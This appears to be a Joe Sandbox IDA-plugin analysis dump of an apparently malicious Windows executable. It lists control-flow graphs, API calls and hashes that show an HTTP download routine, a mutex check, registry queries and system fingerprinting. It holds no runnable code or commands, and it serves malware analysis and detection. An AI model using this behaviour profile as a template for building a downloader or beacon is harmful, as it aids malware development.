1577 cc07e9-cc07f8 1572->1577 1574 cc07b5-cc07bc call cd9e86 1573->1574 1575 cc07a1-cc07af 1573->1575 1574->1572 1575->1574 1581 cc083f 1576->1581 1579 cc080e-cc0815 call cd9e86 1577->1579 1580 cc07fa-cc0808 1577->1580 1579->1576 1580->1579 1582 cc0840-cc08f0 call cdaf20 InternetReadFile 1581->1582
                APIs
                • Sleep.KERNEL32(000005DC,79C85444,?,00000000), ref: 00CC0642
                • InternetOpenW.WININET(00D0DB68,00000000,00000000,00000000,00000000), ref: 00CC0651
                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CC0675
                • HttpOpenRequestA.WININET(?,00000000), ref: 00CC06BF
                • HttpSendRequestA.WININET(?,00000000), ref: 00CC077F
                • InternetReadFile.WININET(?,?,000003FF,?), ref: 00CC0831
                • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 00CC08E0
                • InternetCloseHandle.WININET(?), ref: 00CC0907
                • InternetCloseHandle.WININET(?), ref: 00CC090F
                • InternetCloseHandle.WININET(?), ref: 00CC0917
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                • String ID: YJ3RNw==$eMLY5DB0Qy =$eMLY5zdpQw==$invalid stoi argument$stoi argument out of range
                • API String ID: 1439999335-2043903211
                • Opcode ID: 155a9fdb255e1d11ed077181a0dcde1e95f554aafd5d14c623464688a1e35f22
                • Instruction ID: d652894ca4f582ad7a322a4c80b04f20ddd01b8876ff6fdfa653107b084d1cbf
                • Opcode Fuzzy Hash: 155a9fdb255e1d11ed077181a0dcde1e95f554aafd5d14c623464688a1e35f22
                • Instruction Fuzzy Hash: 8CB1B0B1A10218DBDB24DF28CC85B9EBB79EB81304F6081ADF50997291D7749AC4CFA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1910 ceea7f-ceeaaf call cee3ad call cee3b3 call cee411 1917 ceebce-ceec2a call cdee96 call cf64e7 1910->1917 1918 ceeab5-ceeac1 call cee3b9 1910->1918 1930 ceec2c-ceec32 1917->1930 1931 ceec34-ceec37 1917->1931 1918->1917 1924 ceeac7-ceead3 call cee3e5 1918->1924 1924->1917 1929 ceead9-ceeafa call ce8006 GetTimeZoneInformation 1924->1929 1941 ceebab-ceebcd call cee3a7 call cee39b call cee3a1 1929->1941 1942 ceeb00-ceeb20 1929->1942 1933 ceec81-ceec93 1930->1933 1934 ceec3d-ceec50 call ce8235 1931->1934 1935 ceec39-ceec3b 1931->1935 1938 ceec95-ceec98 1933->1938 1939 ceeca3 1933->1939 1946 ceec5c-ceec75 call cf64e7 1934->1946 1947 ceec52 1934->1947 1935->1933 1938->1939 1943 ceec9a-ceeca1 call cee7de 1938->1943 1944 ceeca8-ceecbd call ce8006 call cd9810 1939->1944 1945 ceeca3 call ceea7f 1939->1945 1948 ceeb2a-ceeb32 1942->1948 1949 ceeb22-ceeb27 1942->1949 1943->1944 1945->1944 1968 ceec7a-ceec7b call ce8006 1946->1968 1969 ceec77-ceec78 1946->1969 1953 ceec53-ceec5a call ce8006 1947->1953 1955 ceeb44-ceeb46 1948->1955 1956 ceeb34-ceeb3b 1948->1956 1949->1948 1972 ceec80 1953->1972 1964 ceeb48-ceeba8 call cdb4a0 * 4 call ce2867 call ceecbe * 2 1955->1964 1956->1955 1963 ceeb3d-ceeb42 1956->1963 1963->1964 1964->1941 1968->1972 1969->1953 1972->1933
                APIs
                • GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00CEECA0,?,?,00000000), ref: 00CEEAF1
                • _free.LIBCMT ref: 00CEEADF
                  • Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
                  • Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E
                • _free.LIBCMT ref: 00CEECA9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                • String ID: Eastern Standard Time$Eastern Summer Time
                • API String ID: 2155170405-239921721
                • Opcode ID: 3ec7b4fc7c66cc1f0edcd82b057874fa8d33e69cd29102c619455581c6d3134a
                • Instruction ID: 0b1857cd00b3e1709cd872e942ee69e4723c7315f89fed6d668b7ee4953dda47
                • Opcode Fuzzy Hash: 3ec7b4fc7c66cc1f0edcd82b057874fa8d33e69cd29102c619455581c6d3134a
                • Instruction Fuzzy Hash: 4A51FA71900364BBCB10EF66DC5699EBB78EF40390B10415AF515E73A1EB309E45EBA0

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1989 cb9a20-cb9aa1 call cdb4a0 GetVersionExW 1992 cb9aad-cb9ad5 call cd3190 call cb61f0 1989->1992 1993 cb9aa3-cb9aa8 1989->1993 2001 cb9ad9-cb9afb call cd3190 call cb61f0 1992->2001 2002 cb9ad7 1992->2002 1995 cb9bef-cb9c0b call cd9810 1993->1995 2007 cb9aff-cb9b18 GetModuleHandleA GetProcAddress 2001->2007 2008 cb9afd 2001->2008 2002->2001 2009 cb9b1a-cb9b29 2007->2009 2010 cb9b49-cb9b74 2007->2010 2008->2007 2013 cb9b2b-cb9b39 2009->2013 2014 cb9b3f-cb9b46 call cd9e86 2009->2014 2011 cb9ba1-cb9bc2 2010->2011 2012 cb9b76-cb9b85 2010->2012 2017 cb9bc8 GetSystemInfo 2011->2017 2018 cb9bc4-cb9bc6 GetNativeSystemInfo 2011->2018 2015 cb9b97-cb9b9e call cd9e86 2012->2015 2016 cb9b87-cb9b95 2012->2016 2013->2014 2019 cb9c0c-cb9c11 call cdee79 2013->2019 2014->2010 2015->2011 2016->2015 2016->2019 2024 cb9bce-cb9bd5 2017->2024 2018->2024 2024->1995 2027 cb9bd7-cb9bdf 2024->2027 2028 cb9be8-cb9beb 2027->2028 2029 cb9be1-cb9be6 2027->2029 2028->1995 2030 cb9bed 2028->2030 2029->1995 2030->1995
                APIs
                • GetVersionExW.KERNEL32(0000011C,?,79C85444,00000000), ref: 00CB9A99
                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9B00
                • GetProcAddress.KERNEL32(00000000), ref: 00CB9B07
                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9BC4
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                • String ID:
                • API String ID: 2167034304-0
                • Opcode ID: f66b737d88ae13fe521e7bf0f0946e24826b98744d46e4bf36597274f87d5312
                • Instruction ID: 5ca82b7766dddb3a87bf695f00284c83332801b56c049078dcdfe323ff8f8f5e
                • Opcode Fuzzy Hash: f66b737d88ae13fe521e7bf0f0946e24826b98744d46e4bf36597274f87d5312
                • Instruction Fuzzy Hash: E0514771D042089BDB24EF68DD497DDBB74EB45310F5042A9E918A73D1EB348EC0CBA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2031 ce065c-ce0691 GetFileType 2032 ce0749-ce074c 2031->2032 2033 ce0697-ce06a2 2031->2033 2034 ce074e-ce0751 2032->2034 2035 ce0775-ce079d 2032->2035 2036 ce06c4-ce06e0 call cdb4a0 GetFileInformationByHandle 2033->2036 2037 ce06a4-ce06b5 call ce09d2 2033->2037 2034->2035 2038 ce0753-ce0755 2034->2038 2040 ce079f-ce07b2 PeekNamedPipe 2035->2040 2041 ce07ba-ce07bc 2035->2041 2043 ce0766-ce0773 GetLastError call ce107c 2036->2043 2052 ce06e6-ce0728 call ce0924 call ce07cc * 3 2036->2052 2049 ce06bb-ce06c2 2037->2049 2050 ce0762-ce0764 2037->2050 2038->2043 2044 ce0757-ce075c call ce10b2 2038->2044 2040->2041 2046 ce07b4-ce07b7 2040->2046 2047 ce07bd-ce07cb call cd9810 2041->2047 2043->2050 2044->2050 2046->2041 2049->2036 2050->2047 2065 ce072d-ce0745 call ce08f1 2052->2065 2065->2041 2068 ce0747 2065->2068 2068->2050
                APIs
                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CE058E), ref: 00CE067E
                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00CE06D8
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00CE058E,?,000000FF,00000000,00000000), ref: 00CE0766
                • __dosmaperr.LIBCMT ref: 00CE076D
                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00CE07AA
                  • Part of subcall function 00CE09D2: __dosmaperr.LIBCMT ref: 00CE0A07
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                • String ID:
                • API String ID: 1206951868-0
                • Opcode ID: ce6ab100770082e83d6110260dc1091205e8c40689f289e538fec044c7c33922
                • Instruction ID: ce3d05025ede571da2a616c7c29be63b648e20ef4fb0a344935f48b437f4c747
                • Opcode Fuzzy Hash: ce6ab100770082e83d6110260dc1091205e8c40689f289e538fec044c7c33922
                • Instruction Fuzzy Hash: 46414C75900384ABDB24DFB6DC459ABBBF9EF88700B244419F556D3211E770A980DFA0

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2482 cbc6d0-cbc707 Sleep CreateMutexA GetLastError 2483 cbc71a-cbc71b 2482->2483 2484 cbc709-cbc70b 2482->2484 2484->2483 2485 cbc70d-cbc718 GetLastError 2484->2485 2485->2483 2486 cbc71c-cbc723 call cdddae 2485->2486
                APIs
                • Sleep.KERNEL32(00000096), ref: 00CBC6D6
                • CreateMutexA.KERNEL32(00000000,00000000,00D17494), ref: 00CBC6F4
                • GetLastError.KERNEL32 ref: 00CBC6FC
                • GetLastError.KERNEL32 ref: 00CBC70D
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast$CreateMutexSleep
                • String ID:
                • API String ID: 3645482037-0
                • Opcode ID: 7bedd34aadae0f9185d9a5bfa1e5766a927bf1853ea5e762ca7a299b18270e7a
                • Instruction ID: d9db7d9cdea9cae3bed1824a5d7614cf16097cf0663c41f11fcf83b22bfa73fb
                • Opcode Fuzzy Hash: 7bedd34aadae0f9185d9a5bfa1e5766a927bf1853ea5e762ca7a299b18270e7a
                • Instruction Fuzzy Hash: 18E04834648340EBE7101B68ED8D79E3627D794711F504464F65ED63A1CF6048C08A31

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2489 ceebd9-ceec2a call cf64e7 2492 ceec2c-ceec32 2489->2492 2493 ceec34-ceec37 2489->2493 2494 ceec81-ceec93 2492->2494 2495 ceec3d-ceec50 call ce8235 2493->2495 2496 ceec39-ceec3b 2493->2496 2498 ceec95-ceec98 2494->2498 2499 ceeca3 2494->2499 2504 ceec5c-ceec75 call cf64e7 2495->2504 2505 ceec52 2495->2505 2496->2494 2498->2499 2501 ceec9a-ceeca1 call cee7de 2498->2501 2502 ceeca8-ceecbd call ce8006 call cd9810 2499->2502 2503 ceeca3 call ceea7f 2499->2503 2501->2502 2503->2502 2517 ceec7a-ceec7b call ce8006 2504->2517 2518 ceec77-ceec78 2504->2518 2508 ceec53-ceec5a call ce8006 2505->2508 2519 ceec80 2508->2519 2517->2519 2518->2508 2519->2494
                APIs
                • _free.LIBCMT ref: 00CEECA9
                  • Part of subcall function 00CEEA7F: _free.LIBCMT ref: 00CEEADF
                  • Part of subcall function 00CEEA7F: GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00CEECA0,?,?,00000000), ref: 00CEEAF1
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$InformationTimeZone
                • String ID:
                • API String ID: 597776487-0
                • Opcode ID: 37325fe2835f1a86fcc05d47f2539c8b47c20101872fa9e0ffcb87eac4c7bc42
                • Instruction ID: cd80de015381ba0ca62009d97e94185b1597d77133ba02ae9200e20e67f73769
                • Opcode Fuzzy Hash: 37325fe2835f1a86fcc05d47f2539c8b47c20101872fa9e0ffcb87eac4c7bc42
                • Instruction Fuzzy Hash: AB21FC7280039966C730AB779D459EB77B8DF403E4F304259E579E3282EE30DE46A660

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2521 ce04f4-ce0500 2522 ce051f-ce0543 call cdb4a0 2521->2522 2523 ce0502-ce051e call ce109f call ce10b2 call cdee69 2521->2523 2529 ce0545-ce055f call ce109f call ce10b2 call cdee69 2522->2529 2530 ce0561-ce0583 CreateFileW 2522->2530 2553 ce05cd-ce05d1 2529->2553 2533 ce0585-ce0589 call ce065c 2530->2533 2534 ce0593-ce059a call ce05d2 2530->2534 2539 ce058e-ce0591 2533->2539 2543 ce059b-ce059d 2534->2543 2539->2543 2545 ce05bf-ce05c2 2543->2545 2546 ce059f-ce05bc call cdb4a0 2543->2546 2549 ce05cb 2545->2549 2550 ce05c4-ce05c5 CloseHandle 2545->2550 2546->2545 2549->2553 2550->2549
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 48e8feaab3b39119be1cb6aed4a9e0885825a63e97eea60cbae642ce005ebf94
                • Instruction ID: 6711f35a231ae04858656c0b9c8b9bbd14c7479036e2cbde824bbf0eaa94050d
                • Opcode Fuzzy Hash: 48e8feaab3b39119be1cb6aed4a9e0885825a63e97eea60cbae642ce005ebf94
                • Instruction Fuzzy Hash: 9A210A31801248BBEB11BB659C42F9E37299F41374F350315F9347B2D1D7B05F45AAA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2554 ce07cc-ce07e2 2555 ce07e4-ce07e8 2554->2555 2556 ce07f2-ce0802 FileTimeToSystemTime 2554->2556 2555->2556 2557 ce07ea-ce07f0 2555->2557 2558 ce0804-ce0816 SystemTimeToTzSpecificLocalTime 2556->2558 2559 ce0842-ce0845 2556->2559 2560 ce0847-ce0852 call cd9810 2557->2560 2558->2559 2561 ce0818-ce0838 call ce0853 2558->2561 2559->2560 2565 ce083d-ce0840 2561->2565 2565->2560
                APIs
                • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00CE0703,?,?,00000000,00000000), ref: 00CE07FA
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00CE0703,?,?,00000000,00000000), ref: 00CE080E
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Time$System$FileLocalSpecific
                • String ID:
                • API String ID: 1707611234-0
                • Opcode ID: 4c19be0c439f4b96adda6bc3a8a47f97127603aca7718b407cef037c6bcbf6c3
                • Instruction ID: 39e7ac816816b9983956c9e209edbbc1eb9b92004e35eb49d5e44959c9d26c3b
                • Opcode Fuzzy Hash: 4c19be0c439f4b96adda6bc3a8a47f97127603aca7718b407cef037c6bcbf6c3
                • Instruction Fuzzy Hash: 1311FE7690024CABDB14DF95C945ADF77BCAF18310F604266E626E2181EB70EB85CBB1

                Control-flow Graph

                APIs
                  • Part of subcall function 00CBC6D0: Sleep.KERNEL32(00000096), ref: 00CBC6D6
                  • Part of subcall function 00CBC6D0: CreateMutexA.KERNEL32(00000000,00000000,00D17494), ref: 00CBC6F4
                  • Part of subcall function 00CBC6D0: GetLastError.KERNEL32 ref: 00CBC6FC
                  • Part of subcall function 00CBC6D0: GetLastError.KERNEL32 ref: 00CBC70D
                  • Part of subcall function 00CCF300: RegOpenKeyExA.KERNEL32(80000002,System,00000000,000F003F,?,00000000), ref: 00CCF3E2
                  • Part of subcall function 00CCF300: RegCloseKey.KERNEL32(80000002), ref: 00CCF3F8
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,00000000), ref: 00CB67BD
                  • Part of subcall function 00CB61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00CB6894
                • CreateThread.KERNEL32(00000000,00000000,Function_00020B40,00000000,00000000,00000000), ref: 00CD0BE0
                • Sleep.KERNEL32(00007530), ref: 00CD0BF5
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CreateErrorLastOpenSleep$CloseInfoMutexQueryThread
                • String ID:
                • API String ID: 2150463253-0
                • Opcode ID: 35ff3c7ad83db74f6a77bfe74d41ce7787c36e50b3daf00ba27b6ca87b4a0f47
                • Instruction ID: a73e4a4c269233ecd305cf3df5260cc4efd62defaa456f73e8b5eda9ae873ed8
                • Opcode Fuzzy Hash: 35ff3c7ad83db74f6a77bfe74d41ce7787c36e50b3daf00ba27b6ca87b4a0f47
                • Instruction Fuzzy Hash: F3E08C346D8704B7E22037A69C0BF9D76055B01B56F28021AFB8D6A2E35DD4B14065BB
                APIs
                • GetComputerNameExW.KERNEL32(00000002,?,?,79C85444,75920F00), ref: 00CBB2A6
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ComputerName
                • String ID:
                • API String ID: 3545744682-0
                • Opcode ID: 3cdac5d20c56faa2fb40404ba67f51e9dec82753f821d00afe26280bef339c41
                • Instruction ID: aa7d6d6d16603ca956a867cad3aa4486a2e2081657e5df6769ddde59442a81eb
                • Opcode Fuzzy Hash: 3cdac5d20c56faa2fb40404ba67f51e9dec82753f821d00afe26280bef339c41
                • Instruction Fuzzy Hash: EC515D719012299BCB20DF68DC88BDDB7B8FB58310F5006DAD819A7691DB74AE84CF91
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                • Instruction ID: 985a8208129b15968623fd392b54145f8332afbf40e984411a14c8cc81f30497
                • Opcode Fuzzy Hash: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                • Instruction Fuzzy Hash: 40016772C04259BEDF51AFA9DD0279D7FF4AB04314F248166FA28F61D1EAB08A84D7D0
                APIs
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,79C85444,79C85444), ref: 00CB639C
                  • Part of subcall function 00CB61F0: RegQueryValueExA.KERNEL32(79C85444,?,00000000,00000000,?,00000400,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63CA
                  • Part of subcall function 00CB61F0: RegCloseKey.KERNEL32(79C85444,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63D6
                • Sleep.KERNEL32 ref: 00CD0BC5
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CloseOpenQuerySleepValue
                • String ID:
                • API String ID: 4119054056-0
                • Opcode ID: ac0ae369eb4bf07b700501299b3d819e18594a8fdfce3d47caf4da27fca96a62
                • Instruction ID: 7b55eb54e3eb4bf2a47c4cd3aa5f08d214f93447407300e7207e450614b98375
                • Opcode Fuzzy Hash: ac0ae369eb4bf07b700501299b3d819e18594a8fdfce3d47caf4da27fca96a62
                • Instruction Fuzzy Hash: 48F0FF35A00204BBCB00BB6CDD07B9E7BB8AB02B20F500359E821A73D2DB305A0497E3
                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CD9243
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CD9251
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CD9262
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CD9273
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CD9284
                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CD9295
                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00CD92A6
                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00CD92B7
                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00CD92C8
                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CD92D9
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CD92EA
                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CD92FB
                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CD930C
                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CD931D
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CD932E
                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CD933F
